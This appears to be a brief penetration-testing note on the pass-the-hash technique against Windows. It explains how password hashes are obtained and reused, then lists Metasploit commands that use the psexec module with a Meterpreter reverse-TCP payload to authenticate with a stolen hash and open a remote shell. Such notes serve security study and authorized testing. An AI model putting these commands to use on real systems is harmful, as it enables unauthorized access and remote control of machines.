17 lines
1.3 KiB
Markdown
17 lines
1.3 KiB
Markdown
## General
|
|
Pass-the-hash (PtH) is a technique that allows an attacker to authenticate to a remote system using the underlying NTLM or LAN Manager (LM) hash of a user's password, instead of the actual password. This can allow an attacker to gain access to a system or network without knowing the actual password of the user.
|
|
|
|
On a Windows system, user passwords are stored in a hashed format in the system's local security database, called the Security Account Manager (SAM). When a user enters their password, the system hashes the entered password and compares it to the stored hash to authenticate the user.
|
|
|
|
In a PtH attack, the attacker obtains the hash of a user's password and uses it to authenticate to a system as that user. This can be done by capturing the hash through a variety of means, such as through a network sniffer, by extracting it from a compromised system, or by using a tool like Mimikatz. Once the attacker has the hash, they can use it to authenticate to a system without knowing the actual password.
|
|
|
|
## Commands
|
|
Make sure you have gather some hash before starting this step and also have a meterpreter session
|
|
|
|
PtH Module
|
|
```
|
|
use windows/smb/psexec
|
|
set payload windows/x64/meterpreter/reverse_tcp
|
|
show options ---> Set the options (RHOST, RPORT, SMB DOMAIN.., USER/PASS or HASH)
|
|
run
|
|
``` |